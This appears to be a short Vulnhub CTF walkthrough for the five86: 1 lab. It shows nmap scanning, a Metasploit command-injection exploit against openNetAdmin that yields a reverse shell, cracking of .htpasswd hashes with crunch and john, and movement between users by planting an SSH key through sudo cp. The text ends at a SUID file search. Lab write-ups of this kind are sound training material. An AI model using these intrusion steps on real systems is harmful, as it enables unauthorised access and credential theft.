five86: 1 Walkthrough Vulnhub CTF
Today we are solving five86: 1 is created by DCAUC and This VM is a purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing. five86 1 walkthrough
Download here five86: 1
our first step is to identify the target IP address we will initiate with netdiscover.
Nmap Aggressive scan. All port and services. and wee see target machine port 22 ssh, 80 http, 10000 Webmin httpd service is running
nmap -A 192.168.1.7
enumerating port 80 http service we open the IP address in the web browser
we see the /ona directory look like openNetAdmin service is running I go to about page and we see the openNetAdmin version.
we go to exploit-db and search openNetAdmin v18.1.1 and I found a command injection exploit now I download the exploit our local system
adding exploit msfconsole copy our exploit Download directory to Metasploit directory
cp /root/Downloads/47772.rb /usr/share/metasploit-framework/modules/exploits/
set rhosts 192.168.1.7
set lhost 192.168.1.4
our session 1 is open and we got a reverse connection target machine
The shell it gave was not proper so to fix that we run the Python One-Liner. As this machine was loaded with the Python3, we need to use the Python3 variant of the One-Liner. for proper shell
python -c 'import pty;pty.spawn("/bin/bash")'
ls -lsa command to check all hidden file and directory and I open .htpasswd file
Creating a wordlist using crunch and length is 10 and use target password character
crunch 10 10 aefhrt >word.txt
Try to crack the hash file with john using our custom wordlist
john --wordlist=word.txt hash
our hashes are crack now changing our shell www-data to user douglas and successfully login with douglas account.
run sudo -l to check for commands that can run as sudo. It looks like dpkg can run as sudo.
Generating an ssh key for our second user
ssh-keygen -b 2048
I copying this key target machine /tmp directory and changing name authorized_keys
cp /home/douglas/.ssh/id_rsa.pub /tmp/authorized_keys
After Creating key now changing the permission this file and copy our second user jen /home/jen/.ssh directory
chmod 777 authorized_keys
sudo -u jen /bin/cp authorized_keys /home/jen/.ssh/
Try to connecting ssh connection without any password and us successfully login with Jen user
After try many directory enumeration I found a mail massage
changing user Jen to the moss with the password found in the mail message
find /home -type f -perm -u=s 2>/dev/null